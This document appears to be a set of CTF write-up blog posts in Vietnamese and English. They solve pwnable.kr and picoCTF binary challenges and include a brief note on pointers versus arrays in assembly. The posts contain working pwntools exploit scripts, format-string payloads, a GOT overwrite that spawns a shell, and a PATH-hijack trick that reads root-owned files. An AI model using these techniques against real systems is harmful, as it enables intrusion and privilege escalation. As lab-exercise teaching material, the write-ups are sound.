   0x00008d88 <+76>:ldrr3, [r11, #-16]
   0x00008d8c <+80>:cmpr2, r3
   0x00008d90 <+84>:bne0x8da8 108>
   0x00008d94 <+88>:ldrr0, [pc, #44]; 0x8dc8 140>
   0x00008d98 <+92>:bl0x1050c <puts>
   0x00008d9c <+96>:ldrr0, [pc, #40]; 0x8dcc 144>
   0x00008da0 <+100>:bl0xf89c 
   0x00008da4 <+104>:b0x8db0 116>
   0x00008da8 <+108>:ldrr0, [pc, #32]; 0x8dd0 148>
   0x00008dac <+112>:bl0x1050c <puts>
   0x00008db0 <+116>:movr3, #0
   0x00008db4 <+120>:movr0, r3
   0x00008db8 <+124>:subsp, r11, #8
   0x00008dbc <+128>:pop{r4, r11, pc}
   0x00008dc0 <+132>:andeqr10, r6, r12, lsl #9
   0x00008dc4 <+136>:andeqr10, r6, r12, lsr #9
   0x00008dc8 <+140>:;  instruction: 0x0006a4b0
   0x00008dcc <+144>:;  instruction: 0x0006a4bc
   0x00008dd0 <+148>:andeqr10, r6, r4, asr #9
End of assembler dump.
(gdb) disass key1
Dump of assembler code for function key1:
   0x00008cd4 <+0>:push{r11}; (str r11, [sp, #-4]!)
   0x00008cd8 <+4>:addr11, sp, #0
   0x00008cdc <+8>:movr3, pc
   0x00008ce0 <+12>:movr0, r3
   0x00008ce4 <+16>:subsp, r11, #0
   0x00008ce8 <+20>:pop{r11}; (ldr r11, [sp], #4)
   0x00008cec <+24>:bxlr
End of assembler dump.
(gdb) disass key2
Dump of assembler code for function key2:
   0x00008cf0 <+0>:push{r11}; (str r11, [sp, #-4]!)
   0x00008cf4 <+4>:addr11, sp, #0
   0x00008cf8 <+8>:push{r6}; (str r6, [sp, #-4]!)
   0x00008cfc <+12>:addr6, pc, #1
   0x00008d00 <+16>:bxr6
   0x00008d04 <+20>:movr3, pc
   0x00008d06 <+22>:addsr3, #4
   0x00008d08 <+24>:push{r3}
   0x00008d0a <+26>:pop{pc}
   0x00008d0c <+28>:pop{r6}; (ldr r6, [sp], #4)
   0x00008d10 <+32>:movr0, r3
   0x00008d14 <+36>:subsp, r11, #0
   0x00008d18 <+40>:pop{r11}; (ldr r11, [sp], #4)
   0x00008d1c <+44>:bxlr
End of assembler dump.
(gdb) disass key3
Dump of assembler code for function key3:
   0x00008d20 <+0>:push{r11}; (str r11, [sp, #-4]!)
   0x00008d24 <+4>:addr11, sp, #0
   0x00008d28 <+8>:movr3, lr
   0x00008d2c <+12>:movr0, r3
   0x00008d30 <+16>:subsp, r11, #0
   0x00008d34 <+20>:pop{r11}; (ldr r11, [sp], #4)
   0x00008d38 <+24>:bxlr
End of assembler dump.
(gdb)

Solution

Chương trình gốc hiểu đơn giản là lấy 3 giá trị của 3 hàm key tính toán rồi so với input của mình. Mục tiêu là tính 3 giá trị đó. Không nhận được binary mà là 1 file asm và với địa chỉ như thế mình nghĩ chương trình là địa chỉ tĩnh. Nên mọi thứ có thể tính được dựa vào file asm.

Với các hàm key thì mình thấy nó không được gọi lệnh trả về nhưng vẫn thu được giá trị. Mình nôm na nghĩ tới việc giá trị sẽ được gán vào thanh ghi nào đó tương tự như EAX → File asm sẽ có ích cho việc này. Thì qua tìm hiểu mình biết được rằng giá trị trả về sẽ được gán vào thanh ghi r0, vậy thì với mỗi hàm key mình sẽ follow giá trị r0 là được.

key1() : pc là thanh ghi trỏ tới địa chỉ của câu lệnh hiện tại + 8, khi chạy tới địa chỉ 0x00008cdc thì thanh ghi pc= 0x00008cdc+8 = 0x8ce4 rồi gán cho r3 và rồi gán cho r0

→ r0 = 0x8ce4

1 2	0x00008cdc <+8>:movr3, pc 0x00008ce0 <+12>:movr0, r3

key2() : với 2 dòng đầu tiên có chức năng đổi mode hiện tại là ARM sang THUMB, thì pc sẽ bước ngắn hơn, giá trị pc sẽ là +4 thay vì +8. Thêm lệnh adds là +4 cho r3 trước khi gán cho r0

→ pc = 0x00008d04+4 = 0x8d08 , r3 = 0x8d08+4 = 0x8d0c, r0 = 0x8d0c

0x00008cfc <+12>:addr6, pc, #1
0x00008d00 <+16>:bxr6
0x00008d04 <+20>:movr3, pc
0x00008d06 <+22>:addsr3, #4
0x00008d08 <+24>:push{r3}
0x00008d0a <+26>:pop{pc}
0x00008d0c <+28>:pop{r6}; (ldr r6, [sp], #4)
0x00008d10 <+32>:movr0, r3

key3() : lr là thanh ghi trỏ tới địa chỉ trả về (giống như 1 thanh ghi mang giá trị RIP). Thì sau khi hàm key3 thực thi xong, nó sẽ tiếp tục trỏ tới 1 lệnh nào đó trong main thì lr sẽ mang giá trị đó.

→ r0 = 0x00008d80

1 2	0x00008d28 <+8>:movr3, lr 0x00008d2c <+12>:movr0, r3

Tổng kết giá trị ta có : 0x8ce4 + 0x8d0c + 0x00008d80 = 0x1a770

Mistake

Description

We all make mistakes, let's move on.
(don't take this too seriously, no fancy hacking skill is required at all)
This task is based on real event

ssh mistake@pwnable.kr -p2222 (pw:guest)

Source

#include 
#include 

#define PW_LEN 10
#define XORKEY 1

void xor(char* s, int len){
int i;
for(i=0; i
s[i] ^= XORKEY;
}
}

int main(int argc, char* argv[]){

int fd;
if(fd=open("/home/mistake/password",O_RDONLY,0400) < 0){
printf("can't open password %d\n", fd);
return 0;
}

printf("do not bruteforce...\n");
sleep(time(0)%20);

char pw_buf[PW_LEN+1];
int len;
if(!(len=read(fd,pw_buf,PW_LEN) > 0)){
printf("read error\n");
close(fd);
return 0;
}

char pw_buf2[PW_LEN+1];
printf("input password : ");
scanf("%10s", pw_buf2);

// xor your input
xor(pw_buf2, 10);

if(!strncmp(pw_buf, pw_buf2, PW_LEN)){
printf("Password OK\n");
setregid(getegid(), getegid());
system("/bin/cat flag\n");
}
else{
printf("Wrong Password\n");
}

close(fd);
return 0;
}

Solution

Lỗi là ở đây :
if(fd=open("/home/mistake/password",O_RDONLY,0400) < 0)

Thứ tự thực thi đã bị sai khi nó gọi open xong thì tới phép so sánh < rồi mới tới gán giá trị cho fd.

thành ra khi mở thành công thì sẽ trả về giá trị file descriptor của file vừa mở, đem đi so sánh với 0, giả sử file descriptor ở đây là 3 thì 3 < 0 là sai → trả về 0 và gán 0 cho biến fd, biến câu lệnh sau thành lệnh đọc input từ stdin :

if(!(len=read(fd,pw_buf,PW_LEN) > 0))

Rồi thì với logic là pw_buf là biến do mình kiểm soát thay vì trong file password, đem so sánh với biến pw_buf2 được qua phép xor của mình thì cả 2 giá trị đều do mình kiểm soát. Thế là xong

Payload

ở đây mình chạy lại output của hàm xor với 1 chuỗi dài 10 kí tự bất kì để thu output. Khi đó chạy chương trình và nhập cả 2 giá trị vào thoi :>

#include 
#include 
#define XORKEY 1
void xor(char *s, int len)
{
    int i;
    for (i = 0; i < len; i++)
    {
        s[i] ^= XORKEY;
    }
}
int main()
{
    char d[] = "1234567890";
    char *c = d;
    xor(d, strlen(d));
    printf("%s", d); //0325476981

}

Ôk hết rồi, hẹn các bạn phần sau :> Phần sau mình sẽ clear toàn bộ Todder :>

[Dummy] - How different between Pointer and Array from Assembly Perspective ?

2025-08-16T17:14:35.000Z

Everyone always told that “Pointer could be an Array” and “Array can be considered as a Ponter” so why it need to be divided into two concepts ?

I create a simple program for testing and debugging.

#include 

int main()
{
    int arr[32] = {0x8, 0x10, 0x18, 0x20};
    int *ptr = arr;
    printf("aaaa");
    printf("a[1]: %d\n", arr[1]);
    printf("*(arr + 1): %d\n", *(arr + 1));

    printf("*(ptr+1): %d\n", *(ptr+1));
    printf("ptr[1]: %d\n", ptr[1]);

}
// gcc -o ./test ./test.c

Because of its properties, Array can access its element like Pointer, also in reverse with Pointer. It is prove that Pointer can be an Array and Array can be a Pointer.

But the difference is how Asm see it ?

Array

I use Pwndbg for debugging. You can see that how it store my arr and ptr variables in stack :

with the code :

1	int arr[32] = {0x8, 0x10, 0x18, 0x20};

Whenever declare an Array, it store the same way with normal variables, it just combine all the variables with the same type in sequence for easily access. So it will store directly in the stack.

You can see this is how *(arr + 1) work, Asm call directly to the address of arr+1 and assign value for eax, then esi. The computer base on the arr+0 address and calculate to arr+1 address for accessing data, just like a Pointer :>

And you can see it the same way when calling in normal way a[1]

Pointer

ptr stored in rbp-8, storing arr+0 address for accessing data.

The code is plus 1 to ptr for next address variable:

1	printf("(ptr+1): %d\n", (ptr+1));

But the Pointer is the opposite with Array, because of knowing entry address of the array, array can access it easily, but the Pointer need to do some calculate for access is adding 0x4 ( size of ptr) like ptr+1 into address value which ptr holding.

and then, ptr can access elements just like array. So you can use ptr for accessing data like array :

1	printf("ptr[1]: %d\n", ptr[1]);

Just like that, easily distinguish between Pointer and Array. May be it the same, may be it not..

[Writeup] - Solving Pwn on PicoCTF

2025-08-16T17:14:35.000Z

Hi guys, this is series clear pwn from medium up to highest difficulty. I write these writeups mainly about the things I’ve learned, so some parts might be detailed while others are brief. Even so, they may still be useful to you if you read them. If you have any questions, free to ask me, Im free to share :>

PIE TIME 2

Description

Author: Darkraicg492

Description
Can you try to get the flag? I'm not revealing anything anymore!!
Additional details will be available after launching your challenge instance.

Source

#include 
#include 
#include 
#include 

void segfault_handler() {
  printf("Segfault Occurred, incorrect address.\n");
  exit(0);
}

void call_functions() {
  char buffer[64];
  printf("Enter your name:");
  fgets(buffer, 64, stdin);
  printf(buffer);

  unsigned long val;
  printf(" enter the address to jump to, ex => 0x12345: ");
  scanf("%lx", &val);

  void (*foo)(void) = (void (*)())val;
  foo();
}

int win() {
  FILE *fptr;
  char c;

  printf("You won!\n");
  // Open file
  fptr = fopen("flag.txt", "r");
  if (fptr == NULL)
  {
      printf("Cannot open file.\n");
      exit(0);
  }

  // Read contents from file
  c = fgetc(fptr);
  while (c != EOF)
  {
      printf ("%c", c);
      c = fgetc(fptr);
  }

  printf("\n");
  fclose(fptr);
}

int main() {
  signal(SIGSEGV, segfault_handler);
  setvbuf(stdout, NULL, _IONBF, 0); // _IONBF = Unbuffered

  call_functions();
  return 0;
}

Checksec

Arch:     amd64
RELRO:      Full RELRO
Stack:      Canary found
NX:         NX enabled
PIE:        PIE enabled
SHSTK:      Enabled
IBT:        Enabled
Stripped:   No

Attack analysis

My way is fast read all the code, so i can see vuln here, because printf need 2 parameter atleast to be safe, instead, it print the buffer value directly and it can has format string vulnerability

void call_functions() {
  char buffer[64];
  printf("Enter your name:");
  fgets(buffer, 64, stdin);
  printf(buffer);

follow the root to find the branch, you can see win() function won’t be called in anywhere, so we have to call it by ourself.

And program flow is call call_function() to enter name, which has vuln format string. Then enter address to jump. So we can call win()

so we need win() address, but we got PIE, you can see it in checksec. It means address will be random.

The address will be calculated follow format : base address + offset

But as you know in code, random not really random, it needs some thing really random to calculate the random, like time. In binary we got ASLR, it’s make base address random with everytime we run, on each computer. In the other hands, it means offset is permanent

so if we can leak any address, we can calculate to base address, hence, we can know every address by know its offset.

In summary, we have a reverse road :

enter win() address ← 
know win() address ←
know win’s offset and base address ← 
leak some address from binary

Payload

from pwn import *
import sys

if len(sys.argv) <= 2:
    p = process("./" + sys.argv[1])
    e = ELF("./" + sys.argv[1], checksec=False)

    gdb.attach(p,
'''
c
'''
)
else:
    remote_addr = sys.argv[1]
    remote_port = sys.argv[2]
    p = remote(remote_addr, int(remote_port))

context.log_level = 'DEBUG'
context.arch = 'amd64'

leak_to_base = 0x1441
win_to_base = 0x136a
p.sendlineafter(b'Enter your name:',b'%19$p')

leaked_address = int(p.recv(14),16)
base = leaked_address - leak_to_base
win = base + win_to_base

log.info('binary leaked : ' + hex(leaked_address))
log.info('base : ' + hex(base))
log.info('win : ' + hex(win))

payload = hex(win).encode()
p.sendlineafter(b'0x12345:',payload)
p.interactive()

flag : picoCTF{p13_5h0u1dn'7_134k_bb903549}

hash-only-1-2

Description

Author: Junias Bonou

Description
Here is a binary that has enough privilege to read the content of the flag file but will only let you know its hash. If only it could just give you the actual content!
Additional details will be available after launching your challenge instance.

Source

int __fastcall main(int argc, const char **argv, const char **envp)
{
  __int64 v3; // rax
  __int64 v4; // rax
  const char *v5; // rax
  __int64 v6; // rdx
  __int64 v7; // rax
  __int64 v8; // rax
  int v9; // ebx
  char v11; // [rsp+Bh] [rbp-45h] BYREF
  unsigned int v12; // [rsp+Ch] [rbp-44h]
  _BYTE v13[40]; // [rsp+10h] [rbp-40h] BYREF
  unsigned __int64 v14; // [rsp+38h] [rbp-18h]

  v14 = __readfsqword(0x28u);
  v3 = std::operator<<char>>(&std::cout, "Computing the MD5 hash of /root/flag.txt.... ", envp);
  v4 = std::ostream::operator<<(v3, &std::endl<char,std::char_traits<char>>);
  std::ostream::operator<<(v4, &std::endl<char,std::char_traits<char>>);
  sleep(2u);
  std::allocator<char>::allocator(&v11);
  std::string::basic_string(v13, "/bin/bash -c 'md5sum /root/flag.txt'", &v11);
  std::allocator<char>::~allocator(&v11);
  setgid(0);
  setuid(0);
  v5 = (const char *)std::string::c_str(v13);
  v12 = system(v5);
  if ( v12 )
  {
    v7 = std::operator<<char>>(&std::cerr, "Error: system() call returned non-zero value: ", v6);
    v8 = std::ostream::operator<<(v7, v12);
    std::ostream::operator<<(v8, &std::endl<char,std::char_traits<char>>);
    v9 = 1;
  }
  else
  {
    v9 = 0;
  }
  std::string::~string(v13);
  return v9;
}

Attack analysis

Before run the program, create /root/flag.txt to make sure it run the properly way.

The program will execute the command : /bin/bash -c ‘md5sum /root/flag.txt’

md5sum is a command to verify integrity of a file, but we will ignore it, because in this challenge we will tricked the system.

md5sum just a command like ls,cd,… are bash scripts too but why we don’t need full path to call it ?

let’s create a bash script to see how its call will different from those command :

┌──(d4vicl㉿Device)-[/mnt/e/CTF/C_PWN/ctf_platform/picoCTF/medium_hash-only-1]
└─$ echo echo 'im in' > script

┌──(d4vicl㉿Device)-[/mnt/e/CTF/C_PWN/ctf_platform/picoCTF/medium_hash-only-1]
└─$ ./script
im in

┌──(d4vicl㉿Device)-[/mnt/e/CTF/C_PWN/ctf_platform/picoCTF/medium_hash-only-1]
└─$ script
Script started, output log file is 'typescript'.
┌──(d4vicl㉿Device)-[/mnt/e/CTF/C_PWN/ctf_platform/picoCTF/medium_hash-only-1]
└─$

hmmm… Why i can’t execute like ls or md5sum ? I have to put ./ in the head to run. So it means system doesn’t mean which command i want to execute ?

Yes, exactly how it works. You should use the command

1	echo $PATH

to see which path system know to execute, and when you call ls command, it will find in all the path listed in the above command, to locate ls

1
2
3

┌──(d4vicl㉿Device)-[/mnt/e/CTF/C_PWN/ctf_platform/picoCTF/medium_hash-only-1]
└─$ echo $PATH
/home/d4vicl/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/usr/games:...

1
2
3

┌──(d4vicl㉿Device)-[/mnt/e/CTF/C_PWN/ctf_platform/picoCTF/medium_hash-only-1]
└─$ which ls
/usr/bin/ls

‘which ls’ to show where ls locate, and when you read $PATH, you can see it has /usr/bin - the folder contain ls command.

so to run a program like this (the script is the file i created above)

1
2
3

┌──(d4vicl㉿Device)-[/mnt/e/CTF/C_PWN/ctf_platform/picoCTF/medium_hash-only-1]
└─$ script
im in

you will need to use this command :

1 2	┌──(d4vicl㉿Device)-[/mnt/e/CTF/C_PWN/ctf_platform/picoCTF/medium_hash-only-1] └─$ PATH=.:$PATH

PATH : is a enviroment variable name

$PATH : is a value of PATH

so it means it will concate current directory (the place you’re standing) . to $PATH - which showed above.

Hence, when you use any command, it will find in . - the current directory.

Specially, it will find command in . first, after that are all the directory listed in order left to right.

So what if exist two command with the same name but in different directory ? Which command will be executed ?

the answer is the one when it found first, then the others which it can find.

So if we use

1	PATH=.:$PATH

it will include . in head. That how we take advantage from it !
back to the program, it will call :

std::string::basic_string(v13, "/bin/bash -c 'md5sum /root/flag.txt'", &v11);
std::allocator<char>::~allocator(&v11);
setgid(0);
setuid(0);
v5 = (const char *)std::string::c_str(v13);
v12 = system(v5);

you can see it set gid(0) which means every group ID’s process will be 0 - root process

we don’t need to know if it set successfully or not, because if it return 0, it means this file wil get root to run.

-1 means it already run in root (lol).

so we don’t have root permission, to read /root/flag.txt, only need to fake md5sum to read.

create a md5sum file with this content in current directory :

1	cat /root/flag.txt

then, we could run flaghasher again to get flag.

with hash-only-2 we will use sh command when ssh connected, then do the same to hash-only-1

flag 1: picoCTF{sy5teM_b!n@riEs_4r3_5c@red_0f_yoU_ae1d8678}

flag 2: picoCTF{Co-@utH0r_Of_Sy5tem_b!n@riEs_1a74f5fd}

format string 2

Description

Source

#include 

int sus = 0x21737573;

int main() {
  char buf[1024];
  char flag[64];

  printf("You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?\n");
  fflush(stdout);
  scanf("%1024s", buf);
  printf("Here's your input: ");
  printf(buf);
  printf("\n");
  fflush(stdout);

  if (sus == 0x67616c66) {
    printf("I have NO clue how you did that, you must be a wizard. Here you go...\n");

    // Read in the flag
    FILE *fd = fopen("flag.txt", "r");
    fgets(flag, 64, fd);

    printf("%s", flag);
    fflush(stdout);
  }
  else {
    printf("sus = 0x%x\n", sus);
    printf("You can do better!\n");
    fflush(stdout);
  }

  return 0;
}

checksec

Arch:     amd64
RELRO:      Partial RELRO
Stack:      No canary found
NX:         NX enabled
PIE:        No PIE (0x400000)
SHSTK:      Enabled
IBT:        Enabled
Stripped:   No

Attack analysis

You can see no PIE, so binary will be static address.

With format string vulnerabiliy :

printf("Here's your input: ");
printf(buf); //vuln
printf("\n");
fflush(stdout);

Our goal is print the flag by trigger the condition : sus == 0x67616c66, and we know sus‘s address because of no PIE.

So we know the sus‘s address, value to trigger and format string, so we will use %n to write a value for sus

Below here is shortest payload by using framework in pwntools.

Payload

from pwn import *
import sys

if len(sys.argv) <= 2:
    p = process("./" + sys.argv[1])
    e = ELF("./" + sys.argv[1], checksec=False)

else:
    remote_addr = sys.argv[1]
    remote_port = sys.argv[2]
    p = remote(remote_addr, int(remote_port))

context.log_level = 'DEBUG'
context.arch = 'amd64'

sus = 0x404060 # goal : sus = 0x67616c66

payload = fmtstr_payload(14,{sus : 0x67616c66})

p.sendlineafter(b'What do you have to say?\n', payload)

p.interactive()

handcraft payload:

from pwn import *
import sys

if len(sys.argv) <= 2:
    p = process("./" + sys.argv[1])
    e = ELF("./" + sys.argv[1], checksec=False)

else:
    remote_addr = sys.argv[1]
    remote_port = sys.argv[2]
    p = remote(remote_addr, int(remote_port))

context.log_level = 'DEBUG'
context.arch = 'amd64'

sus = 0x404060 # goal : sus = 0x6761 6c66

payload = f'%{0x6761}c%24$hn'.encode()
payload += f'%{0x6c66-0x6761}c%25$hn'.encode()
payload = payload.ljust(0x50,b'a')
payload += p64(sus+2)
payload += p64(sus)
p.sendlineafter(b'What do you have to say?\n', payload)

p.interactive()

explain :

fmtstr_payload() : from pwntools

14 : offset when your input entry

{sus : 0x67616c66} : sus is address we want to write value, and 0x67616c66 is that value

flag : picoCTF{f0rm47_57r?_f0rm47_m3m_741fa290}

format string 3

Description

Author: SkrubLawd

Description
This program doesn't contain a win function. How can you win?
Download the binary here.
Download the source here.
Download libc here, download the interpreter here. Run the binary with these two files present in the same directory.
Additional details will be available after launching your challenge instance.

Source

All the file we got :

binary
source
libc
interpreter

Checksec :

Arch:     amd64
RELRO:      Partial RELRO
Stack:      Canary found
NX:         NX enabled
PIE:        No PIE (0x3ff000)
RUNPATH:    b'.'
SHSTK:      Enabled
IBT:        Enabled
Stripped:   No

Attack analysis

Remember always patch binary with libc whenever you receive libc, I use pwninit to patch the libc.

Go around and we can’t see how to get shell or read flag, besides we get libc with different current version, so we need to ret2libc

In libc always has system() function, the goal maybe call command system("/bin/sh")

because of lacking of condition : return to system() + rdi is a pointer to "/bin/sh" string, i look around and see puts is holding that condition:

1	puts(normal_string);

normal_string is "/bin/sh" has been declared. But what’s wrong with puts ?

you can see this :

1	RELRO: Partial RELRO

it means got doesn’t GOT protection, so I think we can attack GOT. Bonus with no PIE it means GOT’s address will be static. Reverse our road we got :

1
2
3

call system("/bin/sh") <-
attack puts's GOT to system() address <-
format string to write into puts's GOT value

Payload

from pwn import *
import sys

if len(sys.argv) <= 2:
    p = process("./" + sys.argv[1])
    e = ELF("./" + sys.argv[1], checksec=False)

    gdb.attach(p,
'''
b*main+145
c
'''
)
else:
    remote_addr = sys.argv[1]
    remote_port = sys.argv[2]
    p = remote(remote_addr, int(remote_port))

context.log_level = 'DEBUG'
context.arch = 'amd64'

got_put = 0x404018
system_to_base = 0x4f760
leak_to_base = 0x7a3f0
payload = p64(got_put)

p.recvuntil(b'in libc: ')
libc_leaked = int(p.recv(14),16)
base = libc_leaked - leak_to_base
system = base + system_to_base
system_tail = system & 0xffffff
log.info('libc base : ' + hex(base))
log.info('system : ' + hex(system))
log.info('system tail : ' + hex(system_tail))

payload = fmtstr_payload(38,{got_put : system})

p.sendline(payload)

p.sendline(b'ls')
p.sendline(b'cat flag.txt')
p.interactive()

handcraft payload :

from pwn import *
import sys

if len(sys.argv) <= 2:
    p = process("./" + sys.argv[1])
    e = ELF("./" + sys.argv[1], checksec=False)

    gdb.attach(p,
'''
b*main+145
c
'''
)
else:
    remote_addr = sys.argv[1]
    remote_port = sys.argv[2]
    p = remote(remote_addr, int(remote_port))

context.log_level = 'DEBUG'
context.arch = 'amd64'

got_put = 0x404018
system_to_base = 0x4f760
leak_to_base = 0x7a3f0
payload = p64(got_put)

p.recvuntil(b'in libc: ')
libc_leaked = int(p.recv(14),16)
base = libc_leaked - leak_to_base
system = base + system_to_base
system_tail = system & 0xffffff
log.info('libc base : ' + hex(base))
log.info('system : ' + hex(system))
log.info('system tail : ' + hex(system_tail))

payload = f'%{system_tail&0xff}c%42$hhn'.encode()
payload += f'%{(system_tail>>8)-(system_tail&0xff)}c%43$hn'.encode()
payload = payload.ljust(32,b'a')

payload += p64(got_put)
payload += p64(got_put+1)
p.sendline(payload)

p.sendline(b'ls')
p.sendline(b'cat flag.txt')
p.interactive()

flag : picoCTF{G07_G07?_cf6cb591}